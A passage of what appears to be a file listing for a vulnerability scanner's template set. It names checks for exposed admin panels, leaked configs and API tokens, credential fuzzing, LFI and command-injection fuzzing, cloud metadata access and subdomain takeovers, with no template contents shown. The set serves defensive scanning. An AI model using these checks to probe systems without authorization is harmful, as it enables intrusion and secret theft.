-exposed-panels/strapi-panel.yaml -exposed-panels/submitty-login.yaml -exposed-panels/subrion-login.yaml -exposed-panels/sugarcrm-panel.yaml -exposed-panels/symantec/symantec-dlp-login.yaml -exposed-panels/symantec/symantec-epm-login.yaml -exposed-panels/symantec/symantec-ewep-login.yaml -exposed-panels/symantec/symantec-pgp-global-directory.yaml -exposed-panels/synnefo-admin-panel.yaml -exposed-panels/synology-rackstation-login.yaml -exposed-panels/sysaid-panel.yaml -exposed-panels/tableau-panel.yaml -exposed-panels/tectuus-scada-monitor.yaml -exposed-panels/teltonika-login.yaml -exposed-panels/terraform-enterprise-panel.yaml -exposed-panels/terramaster-login.yaml -exposed-panels/thinfinity-virtualui-panel.yaml -exposed-panels/threatq-login.yaml -exposed-panels/thruk-login.yaml -exposed-panels/total-web.yaml -exposed-panels/totemomail-detect.yaml -exposed-panels/tracer-sc-login.yaml -exposed-panels/traefik-dashboard.yaml -exposed-panels/trendnet/trendnet-tew827dru-login.yaml -exposed-panels/tuxedo-connected-controller.yaml -exposed-panels/typo3-login.yaml -exposed-panels/unauth-xproxy-dashboard.yaml -exposed-panels/unauthenticated-frp.yaml -exposed-panels/user-control-panel.yaml -exposed-panels/veeam-backup-azure-panel.yaml -exposed-panels/versa-sdwan.yaml -exposed-panels/vigor-login.yaml -exposed-panels/virtual-ema-detect.yaml -exposed-panels/vmware-horizon-panel.yaml -exposed-panels/voipmonitor-panel.yaml -exposed-panels/wago-plc-panel.yaml -exposed-panels/wallix-accessmanager-panel.yaml -exposed-panels/watchguard-panel.yaml -exposed-panels/wazuh-panel.yaml -exposed-panels/weatherlink.yaml -exposed-panels/web-local-craft.yaml -exposed-panels/web-service-panel.yaml -exposed-panels/weblogic-login.yaml -exposed-panels/webmin-panel.yaml -exposed-panels/webmodule-ee-panel.yaml -exposed-panels/whm-login-detect.yaml -exposed-panels/wildfly-panel.yaml -exposed-panels/wordpress-login.yaml -exposed-panels/workresources-rdp.yaml -exposed-panels/workspace-one-uem.yaml -exposed-panels/workspaceone-uem-dashboard.yaml -exposed-panels/wowza-streaming-engine.yaml -exposed-panels/wso2-management-console.yaml -exposed-panels/xds-amr-status.yaml -exposed-panels/xenforo-login.yaml -exposed-panels/xenmobile-login.yaml -exposed-panels/xvr-login.yaml -exposed-panels/xxljob-panel.yaml -exposed-panels/yarn-manager-exposure.yaml -exposed-panels/yopass-panel.yaml -exposed-panels/yzmcms-panel.yaml -exposed-panels/zabbix-server-login.yaml -exposed-panels/zblogphp-panel.yaml -exposed-panels/zenario-login-panel.yaml -exposed-panels/zentao-detect.yaml -exposed-panels/zeroshell-login.yaml -exposed-panels/zimbra-web-client.yaml -exposed-panels/zipkin-exposure.yaml -exposed-panels/zoho/manageengine-adaudit.yaml -exposed-panels/zoho/manageengine-adselfservice.yaml -exposed-panels/zoho/manageengine-analytics.yaml -exposed-panels/zoho/manageengine-apex-helpdesk.yaml -exposed-panels/zoho/manageengine-applications-manager.yaml -exposed-panels/zoho/manageengine-assetexplorer.yaml -exposed-panels/zoho/manageengine-desktop.yaml -exposed-panels/zoho/manageengine-keymanagerplus.yaml -exposed-panels/zoho/manageengine-opmanager.yaml -exposed-panels/zoho/manageengine-servicedesk.yaml -exposed-panels/zoho/manageengine-supportcenter.yaml -exposed-panels/zte-panel.yaml -exposures/apis/couchbase-buckets-api.yaml -exposures/apis/openapi.yaml -exposures/apis/strapi-page.yaml -exposures/apis/wsdl-api.yaml -exposures/backups/exposed-mysql-initial.yaml -exposures/backups/php-backup-files.yaml -exposures/backups/settings-php-files.yaml -exposures/backups/sql-dump.yaml -exposures/backups/zip-backup-files.yaml -exposures/configs/airflow-configuration-exposure.yaml -exposures/configs/alibaba-canal-info-leak.yaml -exposures/configs/amazon-docker-config.yaml -exposures/configs/ansible-config-disclosure.yaml -exposures/configs/apache-config.yaml -exposures/configs/appspec-yml-disclosure.yaml -exposures/configs/awstats-config.yaml -exposures/configs/awstats-script.yaml -exposures/configs/cgi-printenv.yaml -exposures/configs/circleci-config.yaml -exposures/configs/circleci-ssh-config.yaml -exposures/configs/cisco-network-config.yaml -exposures/configs/codeigniter-env.yaml -exposures/configs/composer-config.yaml -exposures/configs/configuration-listing.yaml -exposures/configs/coremail-config-disclosure.yaml -exposures/configs/dbeaver-credentials.yaml -exposures/configs/debug-vars.yaml -exposures/configs/detect-drone-config.yaml -exposures/configs/docker-compose-config.yaml -exposures/configs/dockerfile-hidden-disclosure.yaml -exposures/configs/esmtprc-config.yaml -exposures/configs/exposed-authentication-asmx.yaml -exposures/configs/exposed-bitkeeper.yaml -exposures/configs/exposed-bzr.yaml -exposures/configs/exposed-darcs.yaml -exposures/configs/exposed-gitignore.yaml -exposures/configs/exposed-hg.yaml -exposures/configs/exposed-sharepoint-list.yaml -exposures/configs/exposed-vscode.yaml -exposures/configs/firebase-config-exposure.yaml -exposures/configs/ftp-credentials-exposure.yaml -exposures/configs/git-config.yaml -exposures/configs/git-credentials-disclosure.yaml -exposures/configs/github-workflows-disclosure.yaml -exposures/configs/gmail-api-client-secrets.yaml -exposures/configs/gruntfile-exposure.yaml -exposures/configs/hikvision-info-leak.yaml -exposures/configs/honeywell-scada-config.yaml -exposures/configs/hp-ilo-serial-key-disclosure.yaml -exposures/configs/htpasswd-detection.yaml -exposures/configs/httpd-config.yaml -exposures/configs/javascript-env.yaml -exposures/configs/jetbrains-datasources.yaml -exposures/configs/joomla-config-file.yaml -exposures/configs/keycloak-openid-config.yaml -exposures/configs/kubernetes-kustomization-disclosure.yaml -exposures/configs/kyan-credential-exposure.yaml -exposures/configs/laravel-env.yaml -exposures/configs/lvmeng-uts-disclosure.yaml -exposures/configs/magento-config.yaml -exposures/configs/nagios-status-page.yaml -exposures/configs/netbeans-config.yaml -exposures/configs/netrc.yaml -exposures/configs/nginx-config.yaml -exposures/configs/opcache-status-exposure.yaml -exposures/configs/oracle-ebs-credentials.yaml -exposures/configs/owncloud-config.yaml -exposures/configs/package-json.yaml -exposures/configs/perl-status.yaml -exposures/configs/phalcon-framework-source.yaml -exposures/configs/php-fpm-config.yaml -exposures/configs/phpinfo.yaml -exposures/configs/plesk-stat.yaml -exposures/configs/proftpd-config.yaml -exposures/configs/prometheus-metrics.yaml -exposures/configs/qdpm-info-leak.yaml -exposures/configs/rails-database-config.yaml -exposures/configs/robomongo-credential.yaml -exposures/configs/ruijie-eg-password-leak.yaml -exposures/configs/ruijie-information-disclosure.yaml -exposures/configs/ruijie-nbr1300g-exposure.yaml -exposures/configs/ruijie-phpinfo.yaml -exposures/configs/s3cmd-config.yaml -exposures/configs/saia-web-server-info.yaml -exposures/configs/samba-config.yaml -exposures/configs/server-private-keys.yaml -exposures/configs/sftp-credentials-exposure.yaml -exposures/configs/ssh-authorized-keys.yaml -exposures/configs/ssh-known-hosts.yaml -exposures/configs/svnserve-config.yaml -exposures/configs/syfmony-profiler.yaml -exposures/configs/symfony-database-config.yaml -exposures/configs/symfony-profiler.yaml -exposures/configs/symfony-security-config.yaml -exposures/configs/wpconfig-aws-keys.yaml -exposures/configs/xprober-service.yaml -exposures/configs/yii-debugger.yaml -exposures/configs/zend-config-file.yaml -exposures/files/axis-happyaxis.yaml -exposures/files/bower-json.yaml -exposures/files/cold-fusion-cfcache-map.yaml -exposures/files/crossdomain-xml.yaml -exposures/files/db-schema.yaml -exposures/files/domcfg-page.yaml -exposures/files/ds_store.yaml -exposures/files/dwsync-exposure.yaml -exposures/files/exposed-alps-spring.yaml -exposures/files/github-gemfile-files.yaml -exposures/files/github-page-config.yaml -exposures/files/glpi-status-ldap-domain-disclosure.yaml -exposures/files/glpi-telemetry-disclosure.yaml -exposures/files/gogs-install-exposure.yaml -exposures/files/iceflow-vpn-disclosure.yaml -exposures/files/idea-folder-exposure.yaml -exposures/files/ioncube-loader-wizard.yaml -exposures/files/joomla-file-listing.yaml -exposures/files/keycloak-json.yaml -exposures/files/php-user-ini-disclosure.yaml -exposures/files/phpunit.yaml -exposures/files/putty-private-key-disclosure.yaml -exposures/files/pyproject-disclosure.yaml -exposures/files/rails-secret-token-disclosure.yaml -exposures/files/sensitive-storage-exposure.yaml -exposures/files/shellscripts.yaml -exposures/files/snyk-ignore-file-disclosure.yaml -exposures/files/thumbs-db-disclosure.yaml -exposures/files/webpack-sourcemap-disclosure.yaml -exposures/files/yarn-lock.yaml -exposures/logs/access-log.yaml -exposures/logs/darkstat-detect.yaml -exposures/logs/development-logs.yaml -exposures/logs/django-debug-exposure.yaml -exposures/logs/elmah-log-file.yaml -exposures/logs/error-logs.yaml -exposures/logs/exposed-glances-api.yaml -exposures/logs/idea-logs-exposure.yaml -exposures/logs/jboss-seam-debug-page.yaml -exposures/logs/laravel-log-file.yaml -exposures/logs/laravel-telescope.yaml -exposures/logs/lucee-stack-trace.yaml -exposures/logs/npm-log-file.yaml -exposures/logs/oracle-ebs-sqllog-disclosure.yaml -exposures/logs/php-debug-bar.yaml -exposures/logs/production-logs.yaml -exposures/logs/pyramid-debug-toolbar.yaml -exposures/logs/rails-debug-mode.yaml -exposures/logs/roundcube-log-disclosure.yaml -exposures/logs/squid-analysis-report-generator.yaml -exposures/logs/struts-debug-mode.yaml -exposures/logs/struts-problem-report.yaml -exposures/logs/trace-axd-detect.yaml -exposures/logs/wp-app-log.yaml -exposures/logs/zm-system-log-detect.yaml -exposures/tokens/amazon/amazon-mws-auth-token.yaml -exposures/tokens/amazon/amazon-sns-topic.yaml -exposures/tokens/artifactory/artifactory-api-password.yaml -exposures/tokens/artifactory/artifactory-api-token.yaml -exposures/tokens/bitly/bitly-secret-key.yaml -exposures/tokens/cloudinary/cloudinary-credentials.yaml -exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml -exposures/tokens/digitalocean/tugboat-config-exposure.yaml -exposures/tokens/discord/discord-webhook.yaml -exposures/tokens/docker/dockercfg-config.yaml -exposures/tokens/generic/credentials-disclosure.yaml -exposures/tokens/generic/jdbc-connection-string.yaml -exposures/tokens/generic/jwt-token.yaml -exposures/tokens/generic/shoppable-token.yaml -exposures/tokens/google/fcm-server-key.yaml -exposures/tokens/google/google-calendar-link.yaml -exposures/tokens/google/oauth-access-key.yaml -exposures/tokens/microsoft/microsoft-teams-webhook.yaml -exposures/tokens/newrelic/newrelic-admin-api-key.yaml -exposures/tokens/newrelic/newrelic-insights-key.yaml -exposures/tokens/newrelic/newrelic-rest-api-key.yaml -exposures/tokens/newrelic/newrelic-synthetics-location-key.yaml -exposures/tokens/paypal/braintree-access-token.yaml -exposures/tokens/picatic/picatic-api-key.yaml -exposures/tokens/sendgrid/sendgrid-api-key.yaml -exposures/tokens/slack/slack-bot-token.yaml -exposures/tokens/slack/slack-user-token.yaml -exposures/tokens/slack/slack-webhook-token.yaml -exposures/tokens/sonarqube/sonarqube-token.yaml -exposures/tokens/stripe/stripe-restricted-key.yaml -exposures/tokens/stripe/stripe-secret-key.yaml -exposures/tokens/zapier/zapier-webhook-token.yaml -exposures/tokens/zoho/zoho-webhook-token.yaml -file/android/adb-backup-enabled.yaml -file/android/biometric-detect.yaml -file/android/certificate-validation.yaml -file/android/content-scheme.yaml -file/android/debug-enabled.yaml -file/android/dynamic-broadcast-receiver.yaml -file/android/file-scheme.yaml -file/android/provider-path.yaml -file/android/webview-addjavascript-interface.yaml -file/android/webview-javascript.yaml -file/android/webview-load-url.yaml -file/android/webview-universal-access.yaml -file/electron/electron-version-detect.yaml -file/electron/node-integration-enabled.yaml -file/keys/amazon-mws-auth-token.yaml -file/keys/amazon-sns-token.yaml -file/keys/aws-access-id.yaml -file/keys/aws-cognito.yaml -file/keys/branch-key.yaml -file/keys/cloudinary.yaml -file/keys/credential-exposure.yaml -file/keys/credentials.yaml -file/keys/dynatrace-token.yaml -file/keys/facebook-client-id.yaml -file/keys/facebook-secret.yaml -file/keys/firebase-database.yaml -file/keys/gcp-service-account.yaml -file/keys/github-personal-token.yaml -file/keys/google-api.yaml -file/keys/linkedin-id.yaml -file/keys/mailchimp-api.yaml -file/keys/mailgun-api.yaml -file/keys/paypal-braintree-token.yaml -file/keys/pictatic-api-key.yaml -file/keys/private-key.yaml -file/keys/s3-bucket.yaml -file/keys/sendgrid-api.yaml -file/keys/shopify-custom-token.yaml -file/keys/shopify-private-token.yaml -file/keys/shopify-shared-secret.yaml -file/keys/shopify-token.yaml -file/keys/slack-api.yaml -file/keys/slack-webhook.yaml -file/keys/square-access-token.yaml -file/keys/square-oauth-secret.yaml -file/keys/stripe-api-key.yaml -file/keys/twilio-api.yaml -file/keys/twitter-secret.yaml -file/logs/django-framework-exceptions.yaml -file/logs/python-app-sql-exceptions.yaml -file/logs/ruby-on-rails-framework-exceptions.yaml -file/logs/spring-framework-exceptions.yaml -file/logs/suspicious-sql-error-messages.yaml -file/perl/perl-scanner.yaml -file/php/php-scanner.yaml -file/python/python-scanner.yaml -file/xss/dom-xss.yaml -fuzzing/adminer-panel-fuzz.yaml -fuzzing/cache-poisoning-fuzz.yaml -fuzzing/header-command-injection.yaml -fuzzing/iis-shortname.yaml -fuzzing/linux-lfi-fuzzing.yaml -fuzzing/mdb-database-file.yaml -fuzzing/prestashop-module-fuzz.yaml -fuzzing/wordpress-plugins-detect.yaml -fuzzing/wordpress-themes-detect.yaml -fuzzing/wordpress-weak-credentials.yaml -fuzzing/xff-403-bypass.yaml -headless/dvwa-headless-automatic-login.yaml -headless/extract-urls.yaml -headless/postmessage-outgoing-tracker.yaml -headless/postmessage-tracker.yaml -headless/prototype-pollution-check.yaml -headless/window-name-domxss.yaml -iot/apc-ups-login.yaml -iot/automation-direct.yaml -iot/brother-printer-detect.yaml -iot/brother-unauthorized-access.yaml -iot/codian-mcu-login.yaml -iot/contacam.yaml -iot/envision-gateway.yaml -iot/epmp-login.yaml -iot/epson-wf-series.yaml -iot/grandstream-device-configuration.yaml -iot/heatmiser-wifi-thermostat.yaml -iot/honeywell-building-control.yaml -iot/hp-device-info-detect.yaml -iot/hp-laserjet-detect.yaml -iot/huawei-home-gateway.yaml -iot/internet-service.yaml -iot/iotawatt-app-exposure.yaml -iot/kevinlab-device-detect.yaml -iot/liveview-axis-camera.yaml -iot/lutron-iot-default-login.yaml -iot/mobotix-guest-camera.yaml -iot/netsurveillance-web.yaml -iot/network-camera-detect.yaml -iot/nuuno-network-login.yaml -iot/open-mjpg-streamer.yaml -iot/panasonic-network-management.yaml -iot/qvisdvr-deserialization-rce.yaml -iot/routeros-login.yaml -iot/selea-ip-camera.yaml -iot/stem-audio-table-private-keys.yaml -iot/targa-camera-lfi.yaml -iot/targa-camera-ssrf.yaml -iot/upnp-device.yaml -iot/webcamxp-5.yaml -iot/webtools-home.yaml -iot/xp-webcam.yaml -miscellaneous/addeventlistener-detect.yaml -miscellaneous/apple-app-site-association.yaml -miscellaneous/aws-ecs-container-agent-tasks.yaml -miscellaneous/clientaccesspolicy.yaml -miscellaneous/detect-dns-over-https.yaml -miscellaneous/dir-listing.yaml -miscellaneous/email-extractor.yaml -miscellaneous/google-floc-disabled.yaml -miscellaneous/joomla-htaccess.yaml -miscellaneous/joomla-manifest-file.yaml -miscellaneous/microsoft-azure-error.yaml -miscellaneous/moodle-changelog.yaml -miscellaneous/netflix-conductor-version.yaml -miscellaneous/ntlm-directories.yaml -miscellaneous/old-copyright.yaml -miscellaneous/options-method.yaml -miscellaneous/robots-txt.yaml -miscellaneous/trace-method.yaml -miscellaneous/unpatched-coldfusion.yaml -miscellaneous/xml-schema-detect.yaml -misconfiguration/adobe/adobe-connect-username-exposure.yaml -misconfiguration/adobe/adobe-connect-version.yaml -misconfiguration/aem/aem-bg-servlet.yaml -misconfiguration/aem/aem-crx-bypass.yaml -misconfiguration/aem/aem-default-get-servlet.yaml -misconfiguration/aem/aem-gql-servlet.yaml -misconfiguration/aem/aem-groovyconsole.yaml -misconfiguration/aem/aem-hash-querybuilder.yaml -misconfiguration/aem/aem-jcr-querybuilder.yaml -misconfiguration/aem/aem-login-status.yaml -misconfiguration/aem/aem-merge-metadata-servlet.yaml -misconfiguration/aem/aem-querybuilder-feed-servlet.yaml -misconfiguration/aem/aem-querybuilder-internal-path-read.yaml -misconfiguration/aem/aem-querybuilder-json-servlet.yaml -misconfiguration/aem/aem-setpreferences-xss.yaml -misconfiguration/aem/aem-userinfo-servlet.yaml -misconfiguration/aem/aem-wcm-suggestions-servlet.yaml -misconfiguration/airflow/airflow-debug.yaml -misconfiguration/airflow/unauthenticated-airflow.yaml -misconfiguration/akamai-arl-xss.yaml -misconfiguration/alibaba-mongoshake-unauth.yaml -misconfiguration/ampps-dirlisting.yaml -misconfiguration/android-debug-database-exposed.yaml -misconfiguration/apache/apache-filename-enum.yaml -misconfiguration/apache/apache-hbase-unauth.yaml -misconfiguration/apache/apache-storm-unauth.yaml -misconfiguration/apache/apache-tomcat-snoop.yaml -misconfiguration/application-yaml.yaml -misconfiguration/artifactory-anonymous-deploy.yaml -misconfiguration/aspx-debug-mode.yaml -misconfiguration/aws-object-listing.yaml -misconfiguration/browserless-debugger.yaml -misconfiguration/caddy-open-redirect.yaml -misconfiguration/clockwork-dashboard-exposure.yaml -misconfiguration/cloudflare-image-ssrf.yaml -misconfiguration/cobbler-exposed-directory.yaml -misconfiguration/cx-cloud-upload-detect.yaml -misconfiguration/d-link-arbitary-fileread.yaml -misconfiguration/database-error.yaml -misconfiguration/dgraph-dashboard-exposure.yaml -misconfiguration/django-debug-detect.yaml -misconfiguration/druid-monitor.yaml -misconfiguration/drupal/drupal-user-enum-ajax.yaml -misconfiguration/drupal/drupal-user-enum-redirect.yaml -misconfiguration/etcd-unauthenticated-api.yaml -misconfiguration/exposed-jquery-file-upload.yaml -misconfiguration/exposed-kafdrop.yaml -misconfiguration/exposed-service-now.yaml -misconfiguration/exposed-sqlite-manager.yaml -misconfiguration/formalms-install.yaml -misconfiguration/front-page-misconfig.yaml -misconfiguration/git-web-interface.yaml -misconfiguration/gitlab/gitlab-api-user-enum.yaml -misconfiguration/gitlab/gitlab-public-repos.yaml -misconfiguration/gitlab/gitlab-public-signup.yaml -misconfiguration/gitlab/gitlab-public-snippets.yaml -misconfiguration/gitlab/gitlab-uninitialized-password.yaml -misconfiguration/gitlab/gitlab-user-enum.yaml -misconfiguration/gitlist-disclosure.yaml -misconfiguration/glpi-directory-listing.yaml -misconfiguration/gocd/gocd-cruise-configuration.yaml -misconfiguration/gocd/gocd-encryption-key.yaml -misconfiguration/gocd/gocd-unauth-dashboard.yaml -misconfiguration/grafana-public-signup.yaml -misconfiguration/hadoop-unauth.yaml -misconfiguration/haproxy-status.yaml -misconfiguration/horde-unauthenticated.yaml -misconfiguration/hp/unauthorized-hp-officepro-printer.yaml -misconfiguration/hpe-system-management-anonymous.yaml -misconfiguration/http-missing-security-headers.yaml -misconfiguration/ibm-friendly-path-exposure.yaml -misconfiguration/iis-internal-ip-disclosure.yaml -misconfiguration/jaeger-ui-dashboard.yaml -misconfiguration/java-melody-exposed.yaml -misconfiguration/jboss-status.yaml -misconfiguration/jetty-showcontexts-enable.yaml -misconfiguration/jolokia-unauthenticated-lfi.yaml -misconfiguration/jupyter-ipython-unauth.yaml -misconfiguration/kafka-cruise-control.yaml -misconfiguration/kubeflow-dashboard-unauth.yaml -misconfiguration/kubernetes/kubernetes-metrics.yaml -misconfiguration/kubernetes/kubernetes-pods.yaml -misconfiguration/kubernetes/kubernetes-resource-report.yaml -misconfiguration/laravel-debug-enabled.yaml -misconfiguration/laravel-debug-error.yaml -misconfiguration/linkerd-ssrf-detect.yaml -misconfiguration/manage-engine-ad-search.yaml -misconfiguration/mikrotik-graph.yaml -misconfiguration/misconfigured-concrete5.yaml -misconfiguration/misconfigured-docker.yaml -misconfiguration/nextcloud-install.yaml -misconfiguration/nginx/nginx-status.yaml -misconfiguration/nginx/nginx-vhost-traffic-status.yaml -misconfiguration/node-exporter-metrics.yaml -misconfiguration/office365-open-redirect.yaml -misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml -misconfiguration/openbmcs/openbmcs-ssrf.yaml -misconfiguration/php-errors.yaml -misconfiguration/php-fpm-status.yaml -misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml -misconfiguration/phpmyadmin/phpmyadmin-setup.yaml -misconfiguration/phpmyadmin/phpmyadmin-sql.php-server.yaml -misconfiguration/pinpoint-unauth.yaml -misconfiguration/private-key-exposure.yaml -misconfiguration/prometheus/prometheus-config.yaml -misconfiguration/prometheus/prometheus-exporter.yaml -misconfiguration/prometheus/prometheus-flags.yaml -misconfiguration/prometheus/prometheus-log.yaml -misconfiguration/prometheus/prometheus-targets.yaml -misconfiguration/proxy/metadata-alibaba.yaml -misconfiguration/proxy/metadata-aws.yaml -misconfiguration/proxy/metadata-azure.yaml -misconfiguration/proxy/metadata-digitalocean.yaml -misconfiguration/proxy/metadata-google.yaml -misconfiguration/proxy/metadata-hetzner.yaml -misconfiguration/proxy/metadata-openstack.yaml -misconfiguration/proxy/metadata-oracle.yaml -misconfiguration/proxy/open-proxy-internal.yaml -misconfiguration/proxy/open-proxy-localhost.yaml -misconfiguration/proxy/open-proxy-portscan.yaml -misconfiguration/put-method-enabled.yaml -misconfiguration/python-metrics.yaml -misconfiguration/salesforce-aura.yaml -misconfiguration/sap/sap-directory-listing.yaml -misconfiguration/sap/sap-netweaver-info-leak.yaml -misconfiguration/service-pwd.yaml -misconfiguration/shell-history.yaml -misconfiguration/sitecore-debug-page.yaml -misconfiguration/skycaiji-install.yaml -misconfiguration/solr-query-dashboard.yaml -misconfiguration/sonarqube-public-projects.yaml -misconfiguration/spidercontrol-scada-server-info.yaml -misconfiguration/springboot/springboot-autoconfig.yaml -misconfiguration/springboot/springboot-beans.yaml -misconfiguration/springboot/springboot-configprops.yaml -misconfiguration/springboot/springboot-dump.yaml -misconfiguration/springboot/springboot-env.yaml -misconfiguration/springboot/springboot-gateway.yaml -misconfiguration/springboot/springboot-health.yaml -misconfiguration/springboot/springboot-heapdump.yaml -misconfiguration/springboot/springboot-httptrace.yaml -misconfiguration/springboot/springboot-info.yaml -misconfiguration/springboot/springboot-loggers.yaml -misconfiguration/springboot/springboot-mappings.yaml -misconfiguration/springboot/springboot-metrics.yaml -misconfiguration/springboot/springboot-threaddump.yaml -misconfiguration/springboot/springboot-trace.yaml -misconfiguration/ssrf-via-oauth-misconfig.yaml -misconfiguration/symfony-debugmode.yaml -misconfiguration/tcpconfig.yaml -misconfiguration/unauthenticated-alert-manager.yaml -misconfiguration/unauthenticated-glances.yaml -misconfiguration/unauthenticated-glowroot.yaml -misconfiguration/unauthenticated-influxdb.yaml -misconfiguration/unauthenticated-lansweeper.yaml -misconfiguration/unauthenticated-mongo-express.yaml -misconfiguration/unauthenticated-nacos-access.yaml -misconfiguration/unauthenticated-netdata.yaml -misconfiguration/unauthenticated-popup-upload.yaml -misconfiguration/unauthenticated-prtg.yaml -misconfiguration/unauthenticated-tensorboard.yaml -misconfiguration/unauthenticated-varnish-cache-purge.yaml -misconfiguration/unauthenticated-zipkin.yaml -misconfiguration/unauthorized-hp-printer.yaml -misconfiguration/unauthorized-plastic-scm.yaml -misconfiguration/unauthorized-puppet-node-manager-detect.yaml -misconfiguration/ups-status.yaml -misconfiguration/viewpoint-system-status.yaml -misconfiguration/vulnerabilities/other/umbraco-base-ssrf.yaml -misconfiguration/wamp-server-configuration.yaml -misconfiguration/wildcard-postmessage.yaml -misconfiguration/zabbix-dashboards-access.yaml -misconfiguration/zabbix-error.yaml -misconfiguration/zenphoto-sensitive-info.yaml -misconfiguration/zhiyuan-oa-unauthorized.yaml -network/cisco-smi-exposure.yaml -network/clickhouse-unauth.yaml -network/cowrie-honeypot-detect.yaml -network/detect-addpac-voip-gateway.yaml -network/detect-jabber-xmpp.yaml -network/detect-rsyncd.yaml -network/expn-mail-detect.yaml -network/exposed-adb.yaml -network/exposed-redis.yaml -network/exposed-zookeeper.yaml -network/ftp-default-credentials.yaml -network/ftp-weak-credentials.yaml -network/ganglia-xml-grid-monitor.yaml -network/iplanet-imap-detect.yaml -network/java-rmi-detect.yaml -network/memcached-stats.yaml -network/mongodb-detect.yaml -network/mongodb-unauth.yaml -network/mysql-native-password.yaml -network/printers-info-leak.yaml -network/rdp-detect.yaml -network/samba-detect.yaml -network/sap-router-info-leak.yaml -network/sap-router.yaml -network/smb-v1-detection.yaml -network/smtp-detection.yaml -network/starttls-mail-detect.yaml -network/tidb-native-password.yaml -network/tidb-unauth.yaml -network/totemomail-smtp-detect.yaml -network/unauth-ftp.yaml -network/vnc-detect.yaml -network/vsftpd-detection.yaml -network/weblogic-iiop-detect.yaml -network/weblogic-t3-detect.yaml -ssl/deprecated-tls.yaml -ssl/expired-ssl.yaml -ssl/ssl-dns-names.yaml -ssl/tls-version.yaml -takeovers/aftership-takeover.yaml -takeovers/agilecrm-takeover.yaml -takeovers/aha-takeover.yaml -takeovers/airee-takeover.yaml -takeovers/anima-takeover.yaml -takeovers/announcekit-takeover.yaml -takeovers/aws-bucket-takeover.yaml -takeovers/bigcartel-takeover.yaml -takeovers/bitbucket-takeover.yaml -takeovers/brightcove-takeover.yaml -takeovers/campaignmonitor.yaml -takeovers/canny-takeover.yaml -takeovers/cargo-takeover.yaml -takeovers/cargocollective-takeover.yaml -takeovers/feedpress-takeover.yaml -takeovers/flexbe-takeover.yaml -takeovers/flywheel-takeover.yaml -takeovers/frontify-takeover.yaml -takeovers/gemfury-takeover.yaml -takeovers/getresponse-takeover.yaml -takeovers/ghost-takeover.yaml -takeovers/gitbook-takeover.yaml -takeovers/github-takeover.yaml -takeovers/hatenablog-takeover.yaml -takeovers/helpjuice-takeover.yaml -takeovers/helprace-takeover.yaml -takeovers/helpscout-takeover.yaml -takeovers/heroku-takeover.yaml -takeovers/hubspot-takeover.yaml -takeovers/intercom-takeover.yaml -takeovers/jazzhr-takeover.yaml -takeovers/jetbrains-takeover.yaml -takeovers/kinsta-takeover.yaml -takeovers/launchrock-takeover.yaml -takeovers/mashery-takeover.yaml -takeovers/netlify-takeover.yaml -takeovers/ngrok-takeover.yaml -takeovers/pagewiz-takeover.yaml -takeovers/pantheon-takeover.yaml -takeovers/pingdom-takeover.yaml -takeovers/proposify-takeover.yaml -takeovers/readme-takeover.yaml -takeovers/readthedocs-takeover.yaml -takeovers/shopify-takeover.yaml -takeovers/short-io.yaml -takeovers/simplebooklet-takeover.yaml -takeovers/smartjob-takeover.yaml -takeovers/smugmug-takeover.yaml -takeovers/sprintful-takeover.yaml -takeovers/strikingly-takeover.yaml -takeovers/surge-takeover.yaml -takeovers/surveygizmo-takeover.yaml -takeovers/tave-takeover.yaml -takeovers/teamwork-takeover.yaml -takeovers/tictail-takeover.yaml -takeovers/tilda-takeover.yaml -takeovers/tumblr-takeover.yaml -takeovers/uberflip-takeover.yaml -takeovers/uptimerobot-takeover.yaml -takeovers/vend-takeover.yaml -takeovers/webflow-takeover.yaml -takeovers/wishpond-takeover.yaml -takeovers/wix-takeover.yaml -takeovers/wordpress-takeover.yaml -takeovers/worksites-takeover.yaml -takeovers/wufoo-takeover.yaml -takeovers/zendesk-takeover.yaml -technologies/abyss-web-server.yaml -technologies/achecker-detect.yaml -technologies/acontent-detect.yaml -technologies/activecollab-detect.yaml -technologies/adfs-detect.yaml -technologies/adobe/adobe-coldfusion-detect.yaml -technologies/adobe/adobe-coldfusion-error-detect.yaml -technologies/aem-detection.yaml -technologies/airtame-device-detect.yaml -technologies/apache/airflow-detect.yaml -technologies/apache/apache-axis-detect.yaml -technologies/apache/apache-cocoon-detect.yaml -technologies/apache/apache-detect.yaml -technologies/apache/apache-dubbo-detect.yaml -technologies/apache/apache-guacamole.yaml -technologies/apache/apache-tapestry-detect.yaml -technologies/apache/apache-zeppelin-detect.yaml -technologies/apache/default-apache-test-all.yaml -technologies/apache/default-apache-test-page.yaml -technologies/apache/default-apache2-page.yaml -technologies/apache/default-apache2-ubuntu-page.yaml -technologies/apache/tomcat-detect.yaml -technologies/apache/xampp-default-page.yaml -technologies/apollo-server-detect.yaml -technologies/appcms-detect.yaml -technologies/artica-web-proxy-detect.yaml -technologies/autobahn-python-detect.yaml -technologies/aws-elastic-beanstalk-detect.yaml -technologies/aws/aws-bucket-service.yaml -technologies/aws/aws-cloudfront-service.yaml -technologies/azure-kubernetes-service.yaml -technologies/b2b-builder-detect.yaml -technologies/basic-auth-detection.yaml -technologies/bigbluebutton-detect.yaml -technologies/bigip-detection.yaml -technologies/burp-api-detect.yaml -technologies/carestream-vue-detect.yaml -technologies/chevereto-detect.yaml -technologies/cobbler-version.yaml -technologies/cockpit-detect.yaml -technologies/confluence-detect.yaml -technologies/couchbase-sync-gateway.yaml -technologies/craft-cms-detect.yaml -technologies/csrfguard-detect.yaml -technologies/default-asp-net-page.yaml -technologies/default-centos-test-page.yaml -technologies/default-codeigniter-page.yaml -technologies/default-detect-generic.yaml -technologies/default-django-page.yaml -technologies/default-fastcgi-page.yaml -technologies/default-fedora-page.yaml -technologies/default-glassfish-server-page.yaml -technologies/default-jetty-page.yaml -technologies/default-lighttpd-page.yaml -technologies/default-lucee-page.yaml -technologies/default-movable-page.yaml -technologies/default-openresty.yaml -technologies/default-payara-server-page.yaml -technologies/default-plesk-page.yaml -technologies/default-redhat-test-page.yaml -technologies/default-sitecore-page.yaml -technologies/default-ssltls-test-page.yaml -technologies/dell/dell-idrac6-detect.yaml -technologies/dell/dell-idrac7-detect.yaml -technologies/dell/dell-idrac8-detect.yaml -technologies/dell/dell-idrac9-detect.yaml -technologies/detect-sentry.yaml -technologies/dreambox-detect.yaml -technologies/dwr-index-detect.yaml -technologies/eg-manager-detect.yaml -technologies/elasticsearch-sql-client-detect.yaml -technologies/elfinder-detect.yaml -technologies/empirecms-detect.yaml 